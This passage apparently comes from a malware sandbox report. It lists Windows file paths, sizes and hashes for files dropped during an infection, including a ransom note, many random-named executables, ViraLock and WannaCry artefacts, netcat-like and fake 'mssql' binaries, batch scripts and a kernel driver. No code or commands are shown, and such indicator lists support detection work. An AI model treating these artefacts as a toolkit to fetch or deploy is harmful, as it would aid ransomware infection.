c38a1e6c9e9f2817288f83a457eda99d755adaf3e99531bda6202784f3ed3166

SHA512
ec402b163ec8ae502db5c24f379d8bd4dce10656c8bc27394fe0c4c6c680a25f119d6c1027cd215774f105bf94b8b831ac292333b2638826d39deaece84ab62b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
9KB

MD5
1afc965df91edb6ca65781cc21dec514

SHA1
f6b8ca9b1086990def2ff1edb23ae679ecd18415

SHA256
a36420be08c61c7677986a6635c36fb3cb6086505967e1cb2fb8522e16c12b09

SHA512
66ecc433c4560320322b06ff72b9e46dbe8e91441dfca8526f78224b0ee8fa4f6390e3494f62922fa103904c8449a7d67ecdfbc4cada4333fe04e8a4b2425bed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
9KB

MD5
1d040c0821097ecb6b781fb38c57d060

SHA1
717a84d6512254e6bab56d8a168d5e485e2478ca

SHA256
5af77682a2da3f17316c29460aa85900f7cefb5efc5363f5e2bf28ffaeeb9a34

SHA512
b81b59ca0c963b565203afb52683f05d4449183649827df7298619ffb6f7dc89a58dfc028ce143add0e3a658fbd5f937dcf4d30f83b32f290f3a38411c8d7692

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
9KB

MD5
a3c008499d33e29184aa453b41d07775

SHA1
0e84e9856a3493ad16ccc083facb1afa297cf2d7

SHA256
9cd219177082512796e17bc445513a9954940c5b3dca019e7a97c35dd2cf8108

SHA512
ecd11c6d761a91cbdc6ea9eac84df819a51d26a6362e2f187521a34f00d7a3906ba5ffa298ee209969929a56721cbd18bad53bffed83ed4d6e98da0a3ec30515

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
e43e278cf38f420e4d1e19a4e70a72c2

SHA1
efbf9c23c6840529f85c08c428c9028032ffa354

SHA256
bfdb350f454939c11be0077d3db084fa1eb221d69e69b00253b3087f73ef45ba

SHA512
0aaf4c9272279eda3b92863818fd948fd8c7f128a5103c82cfe7cd1cd669f704bce88bef073ac64ac9b84c05e8f5cf00e68c015e74ebf5940e7139948e7e2aed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
2baa9e8dbdeb464f63884828737dc4c8

SHA1
43255df5417f9b4591b5e51d39d804532dd8cfe1

SHA256
37722897e0f52eeed149c19eb6039829d0a2a6dce3a4d83f87bc92b944d540bc

SHA512
55966b141010b5f3f38ceb21a696a46c4682ae7d1751b2e8cfa164a48714b7b7b21a1db4d1875f9e6f5514b278a4c783c7277061a1f5807096ef84aaaa50b4d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
5KB

MD5
ae0af37947fab4751005045ff2604837

SHA1
e7abd90adc6610ad7d4f784501e528a55e50540c

SHA256
717068730cd43c8f1f0a359089361e12cb2ec25d467ef2654d13246a423e6622

SHA512
80e0b5abeae8c30eabf787ae1d849134156c932417025b3ed4979e620edfe1aa3cd39bd0dbe53c0445688f0fffd425494c8f817ac055773d72a17a9362774075

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
8KB

MD5
0ea1b902cec48d77db47cf5d38209a79

SHA1
2be6bc878f17beae9118c492a6363e369a83151f

SHA256
1ef11c19fd68b5c53223495758cc66d8052fe0f0686371010b158d856ac5d47d

SHA512
dccb243ed0317c33bb09a9da21ad92f142a5c45cb5bb6a150b3fa00d9f72c17c08fd3eb762cc8eef0e011b9972b482bf7ccc301ae79e2bca40b1bf2ddbd4c072

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
9KB

MD5
e2476147f75a0de790f3816d73d895cb

SHA1
ff64e6cf4b33ae6a17c1ce0394bf5d2f8ef00fda

SHA256
b4f0920a387b8a5802952a5a3cabca5378d2a447a72464b77a2e0ca73e8002d1

SHA512
7af85ad9a39064a1de2c84bce0e7a929112245b33883c82b629758c6bb150c470280a46181514b22c4dd98d802c9d92187d017c77127077aeb3a165ca5d15b5f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
9KB

MD5
1474d6138880dbea8bff961a2b6f073f

SHA1
2d55508256de26e5020582be155bd6f240b9fe53

SHA256
fe4660d390e5afd86e20bea5b72dcffee5ffef4163a5dab0bda0886cabd4954e

SHA512
ad305ec546bc1cce3e6925ce0f6630dc24d4b01d9b6c9b47861b5f65812a948f37a753edad509928e5b9fa6684f2fecf89f3e6763b5776671b208bafb9f5228d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
9KB

MD5
2bcca49534c491a51cf166b30b114315

SHA1
e2e7bd33f77af642236fc83788978cb910a3ac0e

SHA256
24018ca633fceae2ba14b905c6b03596a4e1312ae36d130124bc33a6cfa7ff52

SHA512
7c925abee3cce6a925f7e78eef3ba38e3d80c04ba3343555abbc40ff7d7617f6c7b40c9522497a049fe5ca3c3075324bc4a7885d56d0a8ce944a54cb647484ff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
6db414bd1a017702f05db0a279183436

SHA1
e6782f25bfe1716c81f654c134afab5b6b571af2

SHA256
9c0b4cfdde0b5e8b6c41b526a6065bc1a116fa0d70fb359115012b1f8432e5f9

SHA512
ecd459cdf176ae38af48c5fbcb0a06d4b93904d3b22402e0a58efd8df507559d5ddf3af6c2109a353e80ca5d3f986fe97a6ceffd18632a425bcb4a932afc126a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
c693111d441514a7cec96e0d8adf59b4

SHA1
c3c2090aac2b568855a8d645043b12f52a5d61b3

SHA256
d8c4c1c9703110888d95cff0e23757a36d8f45292722902d6bfb86699d825135

SHA512
192f9060b6b2d257baaeb49a76bddefe94ce18bae648fc2996cbe266a29cb3fa6ad21104df629393c8f0cba998707f79bf435adf4f5c0e098bf09d7c1299dd67

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
9dc82a3a2b07c1d5af196be1a6c7819d

SHA1
4212eb63c9f8b5bc1ced8e4aca0949e9ef3e54fa

SHA256
848d603a10d9a0716ee51b4f957ecfb13276ea1a2b0d495dda0b720cac92bccc

SHA512
1a46c052e03edb9864db58b75e9160a7784e4fa4d2ff45c10bc290eb2c711112e293adf7ebe14d17ab9b012e5f1f8bfd2262e1fcdb5626028437fc8b2995a992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
d4327ef453e3b24a529dfeecce4e5d6f

SHA1
617a73476e6d5a9c9492abd82aefb63ef35012a0

SHA256
8b31cd1629821e3374f09270dc4723ae15de5ff4cc15e594b03fa4b8a9adf3e6

SHA512
69d39598284df515f0dd6bb9ac09112296bff26ce63fb7c004a56b746dfb4eaf6c2839794e9f8b804b60bae62d8d2bf666f163f9432d395917b6cdee4930b5be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
0f7ff55e7f131f26d2ecdab637d9dd7e

SHA1
61da390c66069a8dc6177f3e11bab322eab90a79

SHA256
606adad662ab475ac668a0963dc14579a3e69fb4d4b65816569e34e0d20328c2

SHA512
a975f45a3984f91cb75cd7adbf53a4766fc9310771e4a23a1941b533e8bb8376bfc20a97864bc8baa4b2cc83a19795d0ea3b3e9cb257aa0510a7cd33139e63c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
2fbe471cce973bcf5ff8755df25c1f42

SHA1
2dd5908f8648e2694b907c49785c36193cf260e2

SHA256
add42e246e4596457257f469b5e0e05d6a35e78f360d4c93db0b6f94174c712a

SHA512
d86082a479d1358727753463387e85acbfbc30ecdce89e72f8a508263711e9d666d88ad0f6195f6ce34bbc2c4fa8f576cbb0c5c6af04561f4f28e5fcc78eed2c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
8KB

MD5
09478829bb9dbee20fa86f772c8dff0f

SHA1
d68cf0c53c0cb2bc9c853a6513b90cd7c2069503

SHA256
3e4f6eb6b3f13bb66f6a81f3a0604ba1b22ab3517dd678e3c9379ca3e6a367ef

SHA512
9005557bcb9b8da662a19625d7d69654bf1e69dd6f50722d9255dfb69aeb90b2c66cd33951940a0af0cf3173c158ad41d3dca6637491fcbfa275ae57b7d82b17

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
763e5e8d6fadc9ed020a1442f6905818

SHA1
98b50a4c9b24e1e332318877797a17210fe221a8

SHA256
0eda7f94988a00689e0841247a13a743da52bf3b6f26ffd00d60c63e2187fd94

SHA512
2249601cbe8e9e0035d599c62d916676ce972adf0bf7c8008586ca8de7710b0de6fdf36ecda1593b279e6322b18f557b3368df3b6158509d2cd7f7a93810ed08

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe585493.TMP

Filesize
1KB

MD5
e8205863b7055da0caa7289388ce6a12

SHA1
d742f0a0414dd91904c00bcc190979fbcfa14d1d

SHA256
b56fce237f31dbd148b10b1ad3470907c33d24fa2029183b27e8491a7ba901b1

SHA512
b7e9838f8cdf12436767bb589b2b5a533182e964da3317f799a3ca4d9d401306e00b03b8a1aae37889666e380c592d3af91b3ebced9cf397bb92072b1fc4fad5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
ca47719d38704ee0aab8bc784429a0e7

SHA1
6015cea5efdd0efe6f0c9c39f3ba5eb3425eb09d

SHA256
e2b981fc21a117921cdc384d88d0afe9c3699291d6fe55cd78c64fb815450a21

SHA512
fc3aebb702c585171deb310403577e7d061f73268805f15fd6e3f22e1d19d60c68ce5060e618fd29f389866e04fa94c0f007bd7accb6430767f3b7e3539a945a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
7ed85763d16740727d66f46bfeb0b1b7

SHA1
c2a485e281f3d0b6c31d2339d89b241511558492

SHA256
4b58d1c8719a54a38d7c66d2a15e96319f178ec70785c45dbcdc4a420d977b73

SHA512
86c3de326ed00fe3a22ca655eadc9557a9508afcc1eae076fcb2181a3ceb2b4364e8ef29ea23a926fa2acd8f55780ebf8c8600c3a27ed4afc2d9fbc63e64549a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
772b55cefff81f92e221fcefb2fea306

SHA1
51b440c29dcff3bab96717b44cf100b6d4d2f290

SHA256
8cf3d5e43972e923e0bd49d2a1818270e2107a9b1c2030b51a6b404ea0f56cdc

SHA512
9bb1c04acb7be79eadc603321797c60c26960b3444f0c4681ccd720764e08aedf344e65d3d0cfd64575aa4ebd25188f2f3d26c23048ec0377e5dee789735af81

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
cc21972ce1f345dec15aa062777832b2

SHA1
48758efee5e29183a226dfaefb48984452ed17c3

SHA256
7a1de1516167ba327d683a40c91c46768c7eaea2e55e26fea0743b58941275e3

SHA512
1285b894c00c21418e217ed3977630b6492ae02fbc17538c4f239ceab539efe48b35b97e8bb5294d467c51d46bd0c8c8c00077d59c7c59bb96912cd61de986cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
d7281a6821820c0edde374df1bbb130f

SHA1
473e0369769b3d899b7bedbb5f494e92bb4812ec

SHA256
9eb57bc6b6cca8d4f944e0825bc02ac624ed23039a6146f8790c86a1730c9d5a

SHA512
76a85c07444f2c944af9108348d73f4f1f37c29cedbc9a9015f2caf9713b0065c7459c72d5c7a278d3f74f0eae9dc4025fd2329b7f2198e02884e53c1a1d2a39

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
0b1d7198fc8cb5222ba45d8dfb0802ff

SHA1
07008e3a657fc2a2b3324d058608b2c62154f835

SHA256
d0b41479af8ded9531935268abbb86fd6285b1857cdfb45b52f90ca634596f55

SHA512
37981e4c3f1ae03f95e09e841bfa0fad01f5a574ac4b6204e23ee5b877ae7bf50ddba790d62c84b2bf2de6f1012a15affb47052e264c0ca69b85a923ecf0f767

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
8aa4cf473b4a7a36c18cc8346cee3307

SHA1
5e75a3708a76824de29647edb8ca4b79efdfb5a4

SHA256
442432a987a6bd7846a12be109422c1dae02d1c1337ee5e1f24362ef115f884d

SHA512
aec88f63ce47f7a1c716e006e46f31e4bc7986d3741dcebab8aeeedc1e5c839535b17f9d3c43361f53f3662fdc51ebb9b7c485ff100becd47faf27c8e1832c11

Download Submit
C:\Users\Admin\AppData\Local\Temp\VuoEUgoY.bat

Filesize
112B

MD5
bae1095f340720d965898063fede1273

SHA1
455d8a81818a7e82b1490c949b32fa7ff98d5210

SHA256
ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a

SHA512
4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

Download Submit
C:\Users\Admin\AppData\Local\Temp\file.vbs

Filesize
19B

MD5
4afb5c4527091738faf9cd4addf9d34e

SHA1
170ba9d866894c1b109b62649b1893eb90350459

SHA256
59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc

SHA512
16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

Filesize
5KB

MD5
1f072d7c6f1516a04c05d9a2f3f3f90c

SHA1
24d740f6502fe5064f68e163d732481fdafccf93

SHA256
adb4b9fbd598f51b0a3daf317e067b5b5638cd2e9348ad9ff5697d77723e3a4f

SHA512
3e3ae9dcad2787cd38d7756ff0024e81abbbf9af7088e6ef742b830bfddfdf953037627a027a02ecad7587f9fa56e71427979b9b7dfcd685aaa60668fb7a41c3

Download Submit
C:\Users\Admin\Downloads\!Please Read Me!.txt

Filesize
797B

MD5
afa18cf4aa2660392111763fb93a8c3d

SHA1
c219a3654a5f41ce535a09f2a188a464c3f5baf5

SHA256
227082c719fd4394c1f2311a0877d8a302c5b092bcc49f853a5cf3d2945f42b0

SHA512
4161f250d59b7d4d4a6c4f16639d66d21b2a9606de956d22ec00bedb006643fedbbb8e4cde9f6c0c977285918648314883ca91f3442d1125593bf2605f2d5c6b

Download Submit
C:\Users\Admin\Downloads\Ckks.exe

Filesize
310KB

MD5
9bd2645d93b3eb4da85178321fd2ced8

SHA1
d4f531a068446f02dbbc7a72a8ce2564cc1c6c08

SHA256
bfcd54db52140e7a0e918e34a628e787df8120468f41e5f498d11ae2b506b7b5

SHA512
71257cf2275d341f365d7e1e781aae3f4c83509fee73eb79537a2f071a9ababf23a661668cf815b33b16bf09a8e21a7df897c2be8a9cd65f6e6f9264a64e6629

Download Submit
C:\Users\Admin\Downloads\FMEu.exe

Filesize
313KB

MD5
58b3509f69d1ffbe89b386c42ef8256b

SHA1
5737b4043523b8ca91074a55613b6e1cda8b943d

SHA256
8bf7dc561b659220c3ac0e818396868788afa6a4d7541c7d5be4e5baa4822471

SHA512
37517cce66e113480a5154785066294d6b3ea889b76d44ecf7a27fa45901f757fa279c1d18cc0fe7529aa145d10979e2667bd4d835fffbaf6be34c6afaf7687d

Download Submit
C:\Users\Admin\Downloads\Hosq.exe

Filesize
1.8MB

MD5
4fbddde0290714db8345cf0bb0ecc889

SHA1
b86e99998157edaf19a8598ee42f1d92accc2cd7

SHA256
ba5a150902a2cbafadf7363026b17dd1b06f8e1dd3c8ad2011a7daf91f007876

SHA512
de0cc157061feab160051643dd33a4457b1957e9d0ea581fd5692bc35986bc270f184df209f647e13ecaaad8404db1dcf94e89c91b707e81c07c6951e4fb9956

Download Submit
C:\Users\Admin\Downloads\JEAI.exe

Filesize
221KB

MD5
aa70481150564ce567cd28e2e221a5be

SHA1
0b7cbd98afe2585e1552881772a405fc307e5388

SHA256
2d7b38d4e36a3260834a788f556444fbcf306dc394ed862ec6a65af4cc49632a

SHA512
8e5e9e45d32c1182bf155262f38af01c51fb2b308cb326b4e93a3ff2c6d23877776b9b7ec94a7a62c4a1a9f3d60af44f657352ec9e07a4798543f605357cc80f

Download Submit
C:\Users\Admin\Downloads\JMAY.exe

Filesize
221KB

MD5
d33cacde6feebc7820aea8bc697adeaa

SHA1
a8ec2c3e446ec244e3e1d2dcfff8222e4acaa0c4

SHA256
4ddb86def30f685622b562a4b90f38651cca7328e5a60ad5023c744934a269af

SHA512
4838cff344286d6ac2b66e53b1270e5ba5f8fd6c341ec2f9e80dc4ff403c823e393d11ac47ecdb58c8a884bb8b34997b0e8a51665249da24143364c39f600397

Download Submit
C:\Users\Admin\Downloads\KkIO.exe

Filesize
226KB

MD5
3f4641f5d7191bbefb24405d9ce52b4c

SHA1
2029bff186c32e72802f06674807c9df2b99b2db

SHA256
19f50bc11bee4797accb4859d649b909ed37cc4948a40e72f0a0df985f4b3b24

SHA512
7c4eab1b11a0440cbe1540ac14dbac20dc7569f734125495b2149b1b0e101e55f064b2a0574697b0accf3d2727d61c93604285ee5e550ee52b77c5ec382fe764

Download Submit
C:\Users\Admin\Downloads\LsUs.exe

Filesize
228KB

MD5
0ef0e0ea3fed00eebc149a1e2a73faff

SHA1
04b30df5cc3adbc152d2fbe8ff36b9ad249e5d51

SHA256
5f63d5a30e895ece33df359592dc8932818901dd8ed4276d475ad7f7a8199d6f

SHA512
2833d70147357b591d02fad0a0998c47a823c64d9d63ead5022993273f8be02fdfe51c139baa945bd3237ffce15d46578aeacea11404ebf744c0ae7f04c38761

Download Submit
C:\Users\Admin\Downloads\PkUy.exe

Filesize
2.6MB

MD5
bea0b01c97d06ee7db50c5a698d14e56

SHA1
25d76b01f57c460ff253c071086ef9787e0cd1af

SHA256
02cbaa6c21e5aabdce3d3264309eac3a3431c640149957e382393e6781142639

SHA512
76fc72291ab1b36ea1194cfd7aa84f047a7028247dca397786ddcdcba882316b5d441b3b37829029312057dff07a79de10046f7d5f7cc8ac75ad952bc03fa575

Download Submit
C:\Users\Admin\Downloads\Pwgq.exe

Filesize
10.4MB

MD5
5938dfe8bef00392d7e934b3808947e7

SHA1
2f71ec52a2afe68919e929e1ab2219016c6d3814

SHA256
ee17c8a744233ae890a67b3da938538b140c8b35f5e2441e7f41b964f4190473

SHA512
b4a2b0d0253195131eb2575b98e984488376837d942a558971f4a68d4815596bb493474e8e30102dc1cc40ee381c68bad5524869bcebe8aa8f7c7a81e1f87c07

Download Submit
C:\Users\Admin\Downloads\Swwc.exe

Filesize
313KB

MD5
34c149b1538bc296d822afb94cbdddc9

SHA1
56540a1a64170c71cb8ae7bedfcfc0a2d72c1423

SHA256
76e2a61d5f998c3f79e785ca1a308722de3548d8cb3b7b87f1e2b24a9285d936

SHA512
ca1ff331f18643e5bbba07be9c3f8123fa4495cb760e47df412f73a8501cc6f26f241f87e1b557ab654b6ef9a3f31bd8dfa93d3057584d3f2fa41d45f6768852

Download Submit
C:\Users\Admin\Downloads\TIYY.exe

Filesize
223KB

MD5
97e3e104c71e7152f1e0c22d4308c924

SHA1
d72f1b3d638664869c2d7ce1e48655d62b3fdebd

SHA256
7e3c359f94eddf67e7ec306525e7913796343b00be9e647e2dc68c7c277649da

SHA512
ee30484956d30c785b65e7832ed03712e4cf7d14c32fc48864b1a196b3f28a29f059eead45d8b01178d181ca1d7985641770e7a4687c2b08f47915c147fdce85

Download Submit
C:\Users\Admin\Downloads\ToYU.exe

Filesize
247KB

MD5
1a55b9f1f4f49b6c2e90584480d06e09

SHA1
348e06fdf3487d5fb71dcfde9ad0d78d276ca6d3

SHA256
3e5971293394c574cc7cc65cff946075ed9c7c31350e398ee4858b1c9d3643a8

SHA512
f7cdc369fb4caa86d9e5ce5ea5e06a6439b1d8b32bdac545ad631f4e39983e6e35ec74f3768f4209da998224b17a44d3c4c76dae1052d5182668f2ed913b81a6

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 24175.crdownload

Filesize
11.5MB

MD5
928e37519022745490d1af1ce6f336f7

SHA1
b7840242393013f2c4c136ac7407e332be075702

SHA256
6fb303dd8ba36381948127d44bd8541e4a1ab8af07b46526ace08458f2498850

SHA512
8040195ab2b2e15c9d5ffa13a47a61c709738d1cf5e2108e848fedf3408e5bad5f2fc5f523f170f6a80cb33a4f5612d3d60dd343d028e55cfc08cd2f6ed2947c

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 279975.crdownload

Filesize
224KB

MD5
5c7fb0927db37372da25f270708103a2

SHA1
120ed9279d85cbfa56e5b7779ffa7162074f7a29

SHA256
be22645c61949ad6a077373a7d6cd85e3fae44315632f161adc4c99d5a8e6844

SHA512
a15f97fad744ccf5f620e5aabb81f48507327b898a9aa4287051464019e0f89224c484e9691812e166471af9beaddcfc3deb2ba878658761f4800663beef7206

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 601882.crdownload

Filesize
194KB

MD5
8803d517ac24b157431d8a462302b400

SHA1
b56afcad22e8cda4d0e2a98808b8e8c5a1059d4e

SHA256
418395efd269bc6534e02c92cb2c568631ada6e54bc55ade4e4a5986605ff786

SHA512
38fdfe0bc873e546b05a8680335526eec61ccc8cf3f37c60eee0bc83ec54570077f1dc1da26142488930eabcc21cb7a33c1b545a194cbfb4c87e430c4b2bfb50

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 977444.crdownload

Filesize
1.0MB

MD5
055d1462f66a350d9886542d4d79bc2b

SHA1
f1086d2f667d807dbb1aa362a7a809ea119f2565

SHA256
dddf7894b2e6aafa1903384759d68455c3a4a8348a7e2da3bd272555eba9bec0

SHA512
2c5e570226252bdb2104c90d5b75f11493af8ed1be8cb0fd14e3f324311a82138753064731b80ce8e8b120b3fe7009b21a50e9f4583d534080e28ab84b83fee1

Download Submit
C:\Users\Admin\Downloads\ViraLock

Filesize
6KB

MD5
76e08b93985d60b82ddb4a313733345c

SHA1
273effbac9e1dc901a3f0ee43122d2bdb383adbf

SHA256
4dc0a8afbf4dbb1a67b9292bb028b7f744f3029b0083c36307b1f84a00692a89

SHA512
4226266b623d502f9b0901355ff388e1fc705e9baff0cbe49a52ef59578e1cc66f5026c030df4c8a8f5000b743523ccf18c533aee269b562d3017d14af014f9d

Download Submit
C:\Users\Admin\Downloads\WannaCry.exe:Zone.Identifier

Filesize
55B

MD5
0f98a5550abe0fb880568b1480c96a1c

SHA1
d2ce9f7057b201d31f79f3aee2225d89f36be07d

SHA256
2dfb5f4b33e4cf8237b732c02b1f2b1192ffe4b83114bcf821f489bbf48c6aa1

SHA512
dbc1150d831950684ab37407defac0177b7583da0fe13ee8f8eeb65e8b05d23b357722246888189b4681b97507a4262ece96a1c458c4427a9a41d8ea8d11a2f6

Download Submit
C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe

Filesize
1.6MB

MD5
8add121fa398ebf83e8b5db8f17b45e0

SHA1
c8107e5c5e20349a39d32f424668139a36e6cfd0

SHA256
35c4a6c1474eb870eec901cef823cc4931919a4e963c432ce9efbb30c2d8a413

SHA512
8f81c4552ff561eea9802e5319adcd6c7e5bdd1dc4c91e56fda6bdc9b7e8167b222500a0aee5cf27b0345d1c19ac9fa95ae4fd58d4c359a5232bcf86f03d2273

Download Submit
C:\Users\Admin\Downloads\ac\Shadow.bat

Filesize
28B

MD5
df8394082a4e5b362bdcb17390f6676d

SHA1
5750248ff490ceec03d17ee9811ac70176f46614

SHA256
da3f155cfb98ce0add29a31162d23da7596da44ba2391389517fe1a2790da878

SHA512
8ce519dc5c2dd0bbb9f7f48bedf01362c56467800ac0029c8011ee5d9d19e3b3f2eff322e7306acf693e2edb9cf75caaf7b85eb8b2b6c3101ff7e1644950303d

Download Submit
C:\Users\Admin\Downloads\ac\mssql.exe

Filesize
10.2MB

MD5
f6a3d38aa0ae08c3294d6ed26266693f

SHA1
9ced15d08ffddb01db3912d8af14fb6cc91773f2

SHA256
c522e0b5332cac67cde8fc84080db3b8f2e0fe85f178d788e38b35bbe4d464ad

SHA512
814b1130a078dcb6ec59dbfe657724e36aa3db64ed9b2f93d8559b6a50e512365c8596240174141d6977b5ddcf7f281add7886c456dc7463c97f432507e73515

Download Submit
C:\Users\Admin\Downloads\ac\mssql2.exe

Filesize
6.7MB

MD5
f7d94750703f0c1ddd1edd36f6d0371d

SHA1
cc9b95e5952e1c870f7be55d3c77020e56c34b57

SHA256
659e441cadd42399fc286b92bbc456ff2e9ecb24984c0586acf83d73c772b45d

SHA512
af0ced00dc6eeaf6fb3336d9b3abcc199fb42561b8ce24ff2e6199966ad539bc2387ba83a4838301594e50e36844796e96c30a9aa9ad5f03cf06860f3f44e0fa

Download Submit
C:\Users\Admin\Downloads\ac\nc123.exe

Filesize
125KB

MD5
597de376b1f80c06d501415dd973dcec

SHA1
629c9649ced38fd815124221b80c9d9c59a85e74

SHA256
f47e3555461472f23ab4766e4d5b6f6fd260e335a6abc31b860e569a720a5446

SHA512
072565912208e97cc691e1a102e32fd6c243b5a3f8047a159e97aabbe302bddc36f3c52cecde3b506151bc89e0f3b5acf6552a82d83dac6e0180c873d36d3f6b

Download Submit
C:\Users\Admin\Downloads\ac\systembackup.bat

Filesize
1KB

MD5
b4b2f1a6c7a905781be7d877487fc665

SHA1
7ee27672d89940e96bcb7616560a4bef8d8af76c

SHA256
6246b0045ca11da483e38317421317dc22462a8d81e500dee909a5269c086b5f

SHA512
f883cea56a9ac5dcb838802753770494ce7b1de9d7da6a49b878d534810f9c87170f04e0b8b516ae19b9492f40635a72b3e8a4533d39312383c520abe00c5ae6

Download Submit
C:\Users\Admin\Downloads\ac\uxtkwqeosxxsmx.sys

Filesize
674KB

MD5
b2233d1efb0b7a897ea477a66cd08227

SHA1
835a198a11c9d106fc6aabe26b9b3e59f6ec68fd

SHA256
5fd17e3b8827b5bb515343bc4066be0814f6466fb4294501becac284a378c0da

SHA512
6ca61854db877d767ce587ac3d7526cda8254d937a159fd985e0475d062d07ae83e7ff4f9f42c7e1e1cad5e1f408f6849866aa4e9e48b29d80510e5c695cee37

Download Submit
C:\Users\Admin\Downloads\bEEw.exe

Filesize
1.5MB

MD5
be34f833428f755f6ecd2184e51d548d

SHA1
9e5fb2e3cdf2fc1ed221221c0eaa79cf6c582cdd

SHA256
b2e7d028bd99ff41f670588547df865fb372494f73a6a327dc9c2a06dc1c729c

SHA512
421aa28501249cfabf3318b82da5a99f49b6953878a9e519d4009c01a627279365f947621f24b8d1c264734baee88350640e2803a0004fa26d0b24f3c44077f3

Download Submit
C:\Users\Admin\Downloads\bQAQ.exe

Filesize
228KB

MD5
a364d3b5545b44c78205d1476a118757

SHA1
83c009d4323f2203e53df157973a240f31e1f75c

SHA256
38241a9154a9744b09746b0baa4328980672c230faebf56198bda00efcf10cd6

SHA512
dccb6343e37f86bc500472b85a7b72769d801a6dfec41621c3ceef82c2244522fc0511fb73751d249b059094c278b1ef282f17fade86b386f847f1b63ff6cda0

Download Submit
C:\Users\Admin\Downloads\dAIm.exe

Filesize
431KB

MD5
f746a1454d9744a2b1aa33b3c232d996

SHA1
f6c175ecf5be461524c43206cbb2ddfa1d4df152

SHA256
dd5ba0e64456b290b33c54fb9728e9f518c38576cf9c581794b5398257813642

SHA512
bb0d152b8de2e77ba18e413785ddc17da4bc3968d9d555aec33b0cf61b7c6132fbcacb33ffe68118d0793a195d57da2743412488fde892492a906418d8c2012f

Download Submit
C:\Users\Admin\Downloads\egQg.exe

Filesize
11.7MB

MD5
80f6744f806d369ffc8dcdef74cb01ea

SHA1
5b29dfce872ece84ed6fd113fd385b612022b7c3

SHA256
7c8c49e80415ca153083fa1a17350cfc42e8624016df9f2f156a10703fa1153b

SHA512
2c3180bbf884c4af7ed75d295f63af0a63a3257324d9b71f0ea5b83c1a1f4238ce02737cc7a43acef82668c065e8df9120f51f03222cef85ce36e9c805e5e566

Download Submit
C:\Users\Admin\Downloads\gMIY.ico
